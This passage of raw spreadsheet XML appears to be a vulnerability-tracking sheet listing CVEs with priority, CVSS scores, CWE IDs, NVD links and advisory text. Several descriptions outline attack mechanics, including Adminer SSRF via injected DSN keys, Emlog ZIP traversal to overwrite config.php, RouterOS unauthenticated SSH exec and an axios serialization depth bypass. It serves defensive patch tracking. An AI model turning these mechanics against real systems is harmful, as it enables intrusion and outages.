t="n"><v>0.003</v></c><c r="I1475" s="5" t="inlineStr" /><c r="J1475" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K147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475" s="5" t="inlineStr" /><c r="M1475" s="5" t="inlineStr" /><c r="N1475" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1475" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1475" s="5" t="inlineStr" /><c r="Q1475" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1475" s="5" t="inlineStr"><is><t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1475" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80093</t></is></c></row><row r="1476"><c r="A1476" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1476" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1476" s="5" t="inlineStr"><is><t>CVE-2026-81192</t></is></c><c r="D1476" s="5" t="n"><v>7</v></c><c r="E1476" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1476" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1476" s="5" t="inlineStr" /><c r="H1476" s="5" t="n"><v>0.001</v></c><c r="I1476" s="5" t="inlineStr" /><c r="J1476" s="5" t="inlineStr" /><c r="K1476" s="5" t="inlineStr" /><c r="L1476" s="5" t="inlineStr" /><c r="M1476" s="5" t="inlineStr" /><c r="N1476" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1476" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1476" s="5" t="inlineStr" /><c r="Q1476" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="R1476" s="5" t="inlineStr"><is><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is></c><c r="S1476" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81192</t></is></c></row><row r="1477"><c r="A1477" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1477" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1477" s="5" t="inlineStr"><is><t>CVE-2026-81389</t></is></c><c r="D1477" s="5" t="n"><v>7</v></c><c r="E1477" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1477" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1477" s="5" t="inlineStr" /><c r="H1477" s="5" t="n"><v>0.004</v></c><c r="I1477" s="5" t="inlineStr" /><c r="J1477" s="5" t="inlineStr" /><c r="K1477" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1477" s="5" t="inlineStr" /><c r="M1477" s="5" t="inlineStr" /><c r="N1477" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1477" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1477" s="5" t="inlineStr" /><c r="Q1477" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1477" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="S1477" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81389</t></is></c></row><row r="1478"><c r="A1478" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1478" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1478" s="5" t="inlineStr"><is><t>CVE-2026-82062</t></is></c><c r="D1478" s="5" t="n"><v>7</v></c><c r="E1478" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1478" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1478" s="5" t="inlineStr" /><c r="H1478" s="5" t="n"><v>0.004</v></c><c r="I1478" s="5" t="inlineStr" /><c r="J1478" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1478" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1478" s="5" t="inlineStr" /><c r="M1478" s="5" t="inlineStr" /><c r="N1478" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1478" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1478" s="5" t="inlineStr" /><c r="Q1478" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R1478" s="5" t="inlineStr"><is><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is></c><c r="S1478" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82062</t></is></c></row><row r="1479"><c r="A1479" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1479" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1479" s="5" t="inlineStr"><is><t>CVE-2026-83940</t></is></c><c r="D1479" s="5" t="n"><v>7</v></c><c r="E1479" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1479" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1479" s="5" t="inlineStr" /><c r="H1479" s="5" t="n"><v>0.002</v></c><c r="I1479" s="5" t="inlineStr" /><c r="J1479" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1479"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479" s="5" t="inlineStr" /><c r="M1479" s="5" t="inlineStr" /><c r="N1479" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1479" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1479" s="5" t="inlineStr" /><c r="Q1479" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1479" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1479" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83940</t></is></c></row><row r="1480"><c r="A1480" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1480" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1480" s="5" t="inlineStr"><is><t>CVE-2026-83999</t></is></c><c r="D1480" s="5" t="n"><v>7</v></c><c r="E1480" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1480" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1480" s="5" t="inlineStr" /><c r="H1480" s="5" t="n"><v>0.002</v></c><c r="I1480" s="5" t="inlineStr" /><c r="J1480" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1480" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1480" s="5" t="inlineStr" /><c r="M1480" s="5" t="inlineStr" /><c r="N1480" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1480" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1480" s="5" t="inlineStr" /><c r="Q1480" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="R1480" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Resilient File System (ReFS) Deduplication Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1480" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83999</t></is></c></row><row r="1481"><c r="A1481" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1481" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1481" s="5" t="inlineStr"><is><t>CVE-2026-85360</t></is></c><c r="D1481" s="5" t="n"><v>7</v></c><c r="E1481" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1481" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1481" s="5" t="inlineStr" /><c r="H1481" s="5" t="n"><v>0.002</v></c><c r="I1481" s="5" t="inlineStr" /><c r="J1481" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K148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481" s="5" t="inlineStr" /><c r="M1481" s="5" t="inlineStr" /><c r="N1481" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1481" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1481" s="5" t="inlineStr" /><c r="Q1481" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1481" s="5" t="inlineStr"><is><t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1481" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85360</t></is></c></row><row r="1482"><c r="A1482" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1482" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1482" s="5" t="inlineStr"><is><t>CVE-2026-86135</t></is></c><c r="D1482" s="5" t="n"><v>7</v></c><c r="E1482" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1482" s="5" t="inlineStr"><is><t>5d1c2695-1a31-4499-88ae-e847036fd7e3</t></is></c><c r="G1482" s="5" t="inlineStr" /><c r="H1482" s="5" t="n"><v>0.002</v></c><c r="I1482" s="5" t="inlineStr" /><c r="J1482" s="5" t="inlineStr" /><c r="K1482" s="5" t="inlineStr" /><c r="L1482" s="5" t="inlineStr" /><c r="M1482" s="5" t="inlineStr" /><c r="N1482" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1482" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1482" s="5" t="inlineStr" /><c r="Q1482" s="5" t="inlineStr"><is><t>CWE-352, CWE-400</t></is></c><c r="R1482" s="5" t="inlineStr"><is><t>A Cross-Site Request Forgery (CSRF) vulnerability in WatchGuard Dimension's database snapshot creation feature allows a remote attacker to trigger unauthorized snapshot creation by tricking an authenticated administrator into visiting a specially crafted web page.</t></is></c><c r="S1482" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86135</t></is></c></row><row r="1483"><c r="A1483" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1483" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1483" s="5" t="inlineStr"><is><t>CVE-2022-51008</t></is></c><c r="D1483" s="5" t="n"><v>6.9</v></c><c r="E1483" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1483" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1483" s="5" t="inlineStr" /><c r="H1483" s="5" t="n"><v>0.003</v></c><c r="I1483" s="5" t="inlineStr" /><c r="J1483" s="5" t="inlineStr" /><c r="K1483" s="5" t="inlineStr" /><c r="L1483" s="5" t="inlineStr" /><c r="M1483" s="5" t="inlineStr" /><c r="N1483" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1483" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1483" s="5" t="inlineStr" /><c r="Q1483" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R1483" s="5" t="inlineStr"><is><t>PocketMine-MP before 4.12.3 fails to limit unauthenticated sessions, allowing attackers to exhaust player slots by creating sessions without sending LoginPacket. Attackers can flood the server with unauthenticated connections that occupy max-player slots, preventing legitimate players from joining.</t></is></c><c r="S1483" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2022-51008</t></is></c></row><row r="1484"><c r="A1484" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1484" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1484" s="5" t="inlineStr"><is><t>CVE-2026-15580</t></is></c><c r="D1484" s="5" t="n"><v>6.9</v></c><c r="E1484" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1484" s="5" t="inlineStr"><is><t>a5532a13-c4dd-4202-bef1-e0b8f2f8d12b</t></is></c><c r="G1484" s="5" t="inlineStr" /><c r="H1484" s="5" t="n"><v>0.002</v></c><c r="I1484" s="5" t="inlineStr" /><c r="J1484" s="5" t="inlineStr" /><c r="K1484" s="5" t="inlineStr" /><c r="L1484" s="5" t="inlineStr" /><c r="M1484" s="5" t="inlineStr" /><c r="N1484" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1484" s="5" t="inlineStr"><is><t>2026-08-21</t></is></c><c r="P1484" s="5" t="inlineStr" /><c r="Q1484" s="5" t="inlineStr"><is><t>CWE-1385</t></is></c><c r="R1484" s="5" t="inlineStr"><is><t>vault token disclosure via unvalidated postMessage vulnerability in N-able PassPortal allows Authentication Abuse.

This issue affects the PassPortal browser extension: before 3.49.6.</t></is></c><c r="S1484" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-15580</t></is></c></row><row r="1485"><c r="A1485" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1485" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1485" s="5" t="inlineStr"><is><t>CVE-2026-15933</t></is></c><c r="D1485" s="5" t="n"><v>6.9</v></c><c r="E1485" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1485" s="5" t="inlineStr"><is><t>cvd@cert.pl</t></is></c><c r="G1485" s="5" t="inlineStr" /><c r="H1485" s="5" t="n"><v>0.004</v></c><c r="I1485" s="5" t="inlineStr" /><c r="J1485" s="5" t="inlineStr" /><c r="K1485" s="5" t="inlineStr" /><c r="L1485" s="5" t="inlineStr" /><c r="M1485" s="5" t="inlineStr" /><c r="N1485" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1485" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1485" s="5" t="inlineStr" /><c r="Q1485" s="5" t="inlineStr"><is><t>CWE-256</t></is></c><c r="R1485" s="5" t="inlineStr"><is><t>OptimiDoc Server (On-Premise) stores credentials for external services in cleartext. An authenticated administrator can view previously configured service passwords, including SMTP, FTP (for scan delivery), Active Directory (for user list import), and SharePoint credentials, in cleartext via the web administration panel page source, allowing exposure of sensitive third-party authentication data.


This issue was fixed in version 26.08</t></is></c><c r="S1485" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-15933</t></is></c></row><row r="1486"><c r="A1486" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1486" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1486" s="5" t="inlineStr"><is><t>CVE-2026-34964</t></is></c><c r="D1486" s="5" t="n"><v>6.9</v></c><c r="E1486" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1486" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1486" s="5" t="inlineStr" /><c r="H1486" s="5" t="n"><v>0.003</v></c><c r="I1486" s="5" t="inlineStr" /><c r="J1486" s="5" t="inlineStr" /><c r="K1486" s="5" t="inlineStr" /><c r="L1486" s="5" t="inlineStr" /><c r="M1486" s="5" t="inlineStr" /><c r="N1486" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1486" s="5" t="inlineStr"><is><t>2026-08-25</t></is></c><c r="P1486" s="5" t="inlineStr" /><c r="Q1486" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1486" s="5" t="inlineStr"><is><t>Adminer before 5.5.0 contains a server-side request forgery vulnerability in the login form's server field validator, which only inspects leading integers for privileged ports and fails to reject non-numeric port values. Attackers can inject PDO DSN keys like host= and port= into the server parameter to bypass the privileged-port restriction and establish TCP connections to arbitrary internal hosts and ports before authentication.</t></is></c><c r="S1486" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-34964</t></is></c></row><row r="1487"><c r="A1487" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1487" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1487" s="5" t="inlineStr"><is><t>CVE-2026-53602</t></is></c><c r="D1487" s="5" t="n"><v>6.9</v></c><c r="E1487" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1487" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1487" s="5" t="inlineStr" /><c r="H1487" s="5" t="n"><v>0.002</v></c><c r="I1487" s="5" t="inlineStr" /><c r="J1487" s="5" t="inlineStr" /><c r="K1487" s="5" t="inlineStr" /><c r="L1487" s="5" t="inlineStr" /><c r="M1487" s="5" t="inlineStr" /><c r="N1487" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1487" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1487" s="5" t="inlineStr" /><c r="Q1487" s="5" t="inlineStr"><is><t>CWE-285, CWE-862</t></is></c><c r="R1487" s="5" t="inlineStr"><is><t>nebula-mesh is a self-hosted control plane for Slack Nebula mesh VPN. Prior to version 0.3.7, two related authorization gaps let a host that should no longer be trusted obtain a fresh, valid Nebula certificate, because nebula-mgmt does not re-evaluate revocation/authorization state at certificate issuance time — only at poll time. Firstly, the blocklist is not enforced at sign / re-enroll time. internal/api/enroll.go:128 calls caMgr.Sign(...) without consulting the blocklist. The blocklist is only checked in the poll path (internal/api/updates.go:57, fingerprintInBlocklist). The blocklist is keyed by certificate fingerprint (internal/store/sqlite.go), so a re-enrollment produces a new fingerprint that is not in the blocklist. Secondly, renewal does not re-validate operator / CA status. Auto-renewal at poll time (internal/api/updates.go:285-319, signHostCert) reads host.Name, host.Groups, host.NebulaIPs from the DB and re-signs without checking whether the owning operator is still active or the CA still valid. DisableOperator (internal/store/sqlite_operators.go) revokes sessions and API keys but does not retire the operator's CAs, and pki/signer.go checks only CA cert time-expiry, not operator/CA status. This issue has been patched in version 0.3.7.</t></is></c><c r="S1487" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53602</t></is></c></row><row r="1488"><c r="A1488" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1488" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1488" s="5" t="inlineStr"><is><t>CVE-2026-53757</t></is></c><c r="D1488" s="5" t="n"><v>6.9</v></c><c r="E1488" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1488" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1488" s="5" t="inlineStr" /><c r="H1488" s="5" t="n"><v>0.003</v></c><c r="I1488" s="5" t="inlineStr" /><c r="J1488" s="5" t="inlineStr" /><c r="K1488" s="5" t="inlineStr" /><c r="L1488" s="5" t="inlineStr" /><c r="M1488" s="5" t="inlineStr" /><c r="N1488" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1488" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1488" s="5" t="inlineStr" /><c r="Q1488" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1488" s="5" t="inlineStr"><is><t>Emlog is an open source website building system. In versions 2.6.29 and prior, the emUnZip() function extracts all ZIP entries via ZipArchive::extractTo() without validating entry paths for ../ traversal sequences. Only the first entry's subdirectory structure is checked. An attacker can overwrite arbitrary files on the server filesystem, including config.php for immediate RCE. At time of publication, there are no publicly known patches.</t></is></c><c r="S1488" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53757</t></is></c></row><row r="1489"><c r="A1489" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1489" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1489" s="5" t="inlineStr"><is><t>CVE-2026-53933</t></is></c><c r="D1489" s="5" t="n"><v>6.9</v></c><c r="E1489" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1489" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1489" s="5" t="inlineStr" /><c r="H1489" s="5" t="n"><v>0.003</v></c><c r="I1489" s="5" t="inlineStr" /><c r="J1489" s="5" t="inlineStr" /><c r="K1489" s="5" t="inlineStr" /><c r="L1489" s="5" t="inlineStr" /><c r="M1489" s="5" t="inlineStr" /><c r="N1489" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1489" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1489" s="5" t="inlineStr" /><c r="Q1489" s="5" t="inlineStr"><is><t>CWE-203</t></is></c><c r="R1489" s="5" t="inlineStr"><is><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is></c><c r="S1489" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53933</t></is></c></row><row r="1490"><c r="A1490" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1490" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1490" s="5" t="inlineStr"><is><t>CVE-2026-59696</t></is></c><c r="D1490" s="5" t="n"><v>6.9</v></c><c r="E1490" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1490" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G1490" s="5" t="inlineStr" /><c r="H1490" s="5" t="n"><v>0.004</v></c><c r="I1490" s="5" t="inlineStr" /><c r="J1490" s="5" t="inlineStr" /><c r="K1490" s="5" t="inlineStr" /><c r="L1490" s="5" t="inlineStr" /><c r="M1490" s="5" t="inlineStr" /><c r="N1490" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1490" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P1490" s="5" t="inlineStr" /><c r="Q1490" s="5" t="inlineStr"><is><t>CWE-1284</t></is></c><c r="R1490" s="5" t="inlineStr"><is><t>Improper Validation of Specified Quantity in Input vulnerability in Erlang/OTP stdlib allows a remote attacker to degrade availability by supplying a URI whose port component is a very long run of digits.

uri_string:get_port/1 passes the port substring to binary_to_integer/1 with no length bound, catching only error:badarg, so a syntactically valid port of up to roughly 1.26 million digits converts successfully and costs the calling process hundreds of milliseconds of arbitrary-precision arithmetic. The conversion is reached from every authority-parsing path in uri_string:parse/1, including the host, registered-name, and IPv4 and IPv6 forms. parse/1 is the documented interface for parsing URIs, so any application that parses an attacker-supplied URI is exposed without further configuration. The conversion function is documented to accept integers of any size, so bounding the input is the caller's responsibility.

This issue affects OTP from OTP 21.0 before OTP 27.3.4.17, from OTP 28.0 before OTP 28.5.0.6, and from OTP 29.0 before OTP 29.0.6, corresponding to stdlib from 3.5 before 6.2.2.5, from 7.0 before 7.3.0.2, and from 8.0 before 8.0.4.</t></is></c><c r="S1490" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-59696</t></is></c></row><row r="1491"><c r="A1491" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1491" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1491" s="5" t="inlineStr"><is><t>CVE-2026-62652</t></is></c><c r="D1491" s="5" t="n"><v>6.9</v></c><c r="E1491" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1491" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G1491" s="5" t="inlineStr" /><c r="H1491" s="5" t="n"><v>0.002</v></c><c r="I1491" s="5" t="inlineStr" /><c r="J1491" s="5" t="inlineStr" /><c r="K1491" s="5" t="inlineStr" /><c r="L1491" s="5" t="inlineStr" /><c r="M1491" s="5" t="inlineStr" /><c r="N1491" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1491" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1491" s="5" t="inlineStr" /><c r="Q1491" s="5" t="inlineStr"><is><t>CWE-215</t></is></c><c r="R1491" s="5" t="inlineStr"><is><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is></c><c r="S1491" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62652</t></is></c></row><row r="1492"><c r="A1492" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1492" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1492" s="5" t="inlineStr"><is><t>CVE-2026-62993</t></is></c><c r="D1492" s="5" t="n"><v>6.9</v></c><c r="E1492" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1492" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1492" s="5" t="inlineStr" /><c r="H1492" s="5" t="n"><v>0.004</v></c><c r="I1492" s="5" t="inlineStr" /><c r="J1492" s="5" t="inlineStr" /><c r="K1492" s="5" t="inlineStr" /><c r="L1492" s="5" t="inlineStr" /><c r="M1492" s="5" t="inlineStr" /><c r="N1492" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1492" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P1492" s="5" t="inlineStr" /><c r="Q1492" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1492" s="5" t="inlineStr"><is><t>Smarty is a template engine for PHP, facilitating the separation of presentation (HTML/CSS) from application logic. Prior to 4.5.7 and 5.8.2, depending on the release line, Smarty's {fetch} handling in libs/plugins/function.fetch.php and src/FunctionHandler/Fetch.php used Security::isTrustedUri() to validate only the initial remote URL against trusted_uri when a security policy was active. For resources handled by file_get_contents(), including HTTPS URLs, PHP followed HTTP redirects by default. An attacker who could supply or influence a fetch target and had an open redirect on a trusted host could redirect the request to an attacker-chosen internal endpoint, bypass the trusted_uri allowlist, and perform server-side request forgery. This issue is fixed in versions 4.5.7 and 5.8.2.</t></is></c><c r="S1492" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62993</t></is></c></row><row r="1493"><c r="A1493" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1493" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1493" s="5" t="inlineStr"><is><t>CVE-2026-67279</t></is></c><c r="D1493" s="5" t="n"><v>6.9</v></c><c r="E1493" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1493" s="5" t="inlineStr"><is><t>cvd@cert.pl</t></is></c><c r="G1493" s="5" t="inlineStr" /><c r="H1493" s="5" t="n"><v>0.004</v></c><c r="I1493" s="5" t="inlineStr" /><c r="J1493" s="5" t="inlineStr" /><c r="K1493" s="5" t="inlineStr" /><c r="L1493" s="5" t="inlineStr" /><c r="M1493" s="5" t="inlineStr" /><c r="N1493" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1493" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1493" s="5" t="inlineStr" /><c r="Q1493" s="5" t="inlineStr"><is><t>CWE-841</t></is></c><c r="R1493" s="5" t="inlineStr"><is><t>RouterOS SSH enters the connection protocol after a client-requested rekey even though user authentication was never attempted, allowing an unauthenticated client to open a session channel and send an exec request. On affected builds the server dispatches the command, enabling unauthenticated creation, overwrite, and reconstruction of files in the RouterOS managed file namespace, including support files containing configuration and diagnostic data.This issue was fixed in versions: 6.49.21 (Long-term), 7.23.4 (Long-term) and 7.24.2 (Stable)</t></is></c><c r="S1493" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67279</t></is></c></row><row r="1494"><c r="A1494" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1494" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1494" s="5" t="inlineStr"><is><t>CVE-2026-67321</t></is></c><c r="D1494" s="5" t="n"><v>6.9</v></c><c r="E1494" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1494" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1494" s="5" t="inlineStr" /><c r="H1494" s="5" t="n"><v>0.004</v></c><c r="I1494" s="5" t="inlineStr" /><c r="J1494" s="5" t="inlineStr" /><c r="K1494" s="5" t="inlineStr" /><c r="L1494" s="5" t="inlineStr"><is><t>npm:axios</t></is></c><c r="M1494" s="5" t="inlineStr"><is><t>0.33.0, 1.18.0</t></is></c><c r="N1494" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O1494" s="5" t="inlineStr" /><c r="P1494" s="5" t="inlineStr" /><c r="Q1494" s="5" t="inlineStr"><is><t>CWE-674</t></is></c><c r="R1494" s="5" t="inlineStr"><is><t>## Summary

Axios versions in the fixed lines for GHSA-62hf-57xw-28j9 still contain an incomplete depth-limit bypass in `lib/helpers/toFormData.js`. When serializing an object with a top-level key ending in `{}`, axios calls `JSON.stringify()` on that value before the `formSerializer.maxDepth` guard can inspect the nested structure.

An attacker who can control object keys and nested values passed by an application into axios form or parameter serialization can trigger a raw `RangeError: Maximum call stack size exceeded`, causing a denial of service in the affected request path.

## Impact

The impact is availability only. No confidentiality or integrity impact was confirmed.

Server-side applications are the primary concern when they accept user-controlled input and pass it into axios as `data` or `params` for `multipart/form-data`, `application/x-www-form-urlencoded`, or default parameter serialization. Browser impact is limited to the page or request context unless the application builds a broader failure mode around the thrown exception.

The attack requires control over a top-level object key ending in `{}` and a deeply nested object value. The option `formSerializer.metaTokens: false` is not a workaround because it only changes the emitted key name; the value is still stringified.

## Affected Functionality

Affected paths include:

- `lib/helpers/toFormData.js` when a top-level key ends with `{}`.
- `lib/helpers/toURLEncodedForm.js`, which delegates to `helpers.defaultVisitor`.
- `lib/helpers/AxiosURLSearchParams.js`, used by default params serialization.
- Request transforms in `lib/defaults/index.js` when object data is serialized as `multipart/form-data` or `application/x-www-form-urlencoded`.

Unaffected paths include:

- Already-created `FormData` or `URLSearchParams` values that axios does not walk with `toFormData`.
- Custom `paramsSerializer.serialize` implementations that do not call axios `toFormData`.
- Non-`{}` deeply nested values in `toFormData`, which hit `ERR_FORM_DATA_DEPTH_EXCEEDED` as intended.

## Technical Details

In `lib/helpers/toFormData.js`, `defaultVisitor()` handles top-level keys ending in `{}` before recursive traversal:

```js
if (value &amp;&amp; !path &amp;&amp; typeof value === 'object') {
  if (utils.endsWith(key, '{}')) {
    key = metaTokens ? key : key.slice(0, -2);
